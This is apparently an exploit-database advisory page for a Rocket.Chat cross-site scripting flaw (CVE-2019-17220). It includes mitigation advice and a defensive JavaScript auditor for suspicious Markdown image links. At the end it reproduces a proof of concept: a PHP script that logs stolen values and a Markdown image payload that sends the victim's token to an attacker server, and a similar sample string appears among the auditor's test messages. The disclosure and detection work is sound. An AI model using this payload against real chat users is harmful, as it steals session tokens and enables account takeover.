Vendor: Rocket.Chat
By: 3H34N
CVSS: 6.1 (MEDIUM)
Cross-Site Scripting (CWE-79)
Product Name: Rocket.Chat
Affected Version From: Rocket.Chat < 2.1.0
Affected Version To: Rocket.Chat < 2.1.0
Patch Exists: YES
Related CVE: CVE-2019-17220
CPE: a:rocket:rocket.chat
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
2019

Rocket.Chat 2.1.0 – Cross-Site Scripting

Rocket.Chat version 2.1.0 is vulnerable to Cross-Site Scripting (XSS). An attacker can craft a malicious payload and send it to a victim in a chat session. When the victim opens the chat session, the payload executes and the victim's token is sent to the attacker's web server, where it is written to logs.txt.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of Rocket.Chat.
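
Alongside patching, stored messages can be audited for Markdown image links shaped like the payload in the PoC on this page. This is an added example, not code from Rocket.Chat or from the exploit author; the function names, the trusted-host list and the sample messages are assumptions constructed for illustration.

```javascript
// Added example, not Rocket.Chat code. Flags Markdown image links whose target
// has raw characters invalid in a URL, a non-http(s) scheme, or an unlisted host.

// Assumption: hosts this deployment expects inline images from.
const TRUSTED_IMAGE_HOSTS = new Set(["chat.example.org", "cdn.example.org"]);

// ![alt](target): the target runs to the first ")", as in the PoC.
const MD_IMAGE = /!\[([^\]]*)\]\(([^)]*)\)/g;

// RFC 3986 allows none of these unencoded in a URI. A Markdown image title
// (![a](url "t")) would also trip this; strip titles first if you use them.
const NEVER_RAW_IN_URL = /[`{}<>"\\^|\s]/;

function auditMessage(text) {
  const findings = [];
  for (const match of text.matchAll(MD_IMAGE)) {
    const target = match[2].trim();
    const reasons = [];
    if (NEVER_RAW_IN_URL.test(target)) reasons.push("raw-metacharacter");
    let url = null;
    try {
      url = new URL(target);
    } catch {
      reasons.push("unparseable-url");
    }
    if (url && url.protocol !== "http:" && url.protocol !== "https:") {
      reasons.push("non-http-scheme");
    } else if (url && !TRUSTED_IMAGE_HOSTS.has(url.hostname)) {
      reasons.push("untrusted-host");
    }
    if (reasons.length > 0) findings.push({ target, reasons });
  }
  return findings;
}

// Constructed sample messages, not real chat data.
const SAMPLE_MESSAGES = [
  "lunch? ![menu](https://cdn.example.org/menu.png)",
  "![title](http://collector.example/l33t.php?leet=+`{}token`)",
  "![doc](ftp://files.example.org/a.png)",
  "plain text with `inline code` and (parentheses)",
];

function auditAll(messages) {
  return messages
    .map((text, index) => ({ index, findings: auditMessage(text) }))
    .filter((entry) => entry.findings.length > 0);
}
console.log(JSON.stringify(auditAll(SAMPLE_MESSAGES), null, 2));
```

A hit is a lead for review rather than proof of compromise. Relative image targets are reported as unparseable, so resolve them against your server URL first if your deployment uses them.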

Exploit-DB raw data:

# Title: Rocket.Chat 2.1.0 - Cross-Site Scripting
# Author: 3H34N
# Date: 2019-10-22
# Product: Rocket.Chat
# Vendor: https://rocket.chat/
# Vulnerable Version(s): Rocket.Chat < 2.1.0
# CVE: CVE-2019-17220
# Special Thanks : Ali razmjoo, Mohammad Reza Espargham (@rezesp)

# PoC
# 1. Create l33t.php on a web server

<?php
$output = fopen("logs.txt", "a+") or die("WTF? o.O");
$leet = $_GET['leet']."\n\n";
fwrite($output, $leet);
fclose($output);
?>

# 2. Open a chat session
# 3. Send payload with your web server url

![title](http://10.10.1.5/l33t.php?leet=+`{}token`)

# 4. The token will be written to logs.txt when the target sees your message.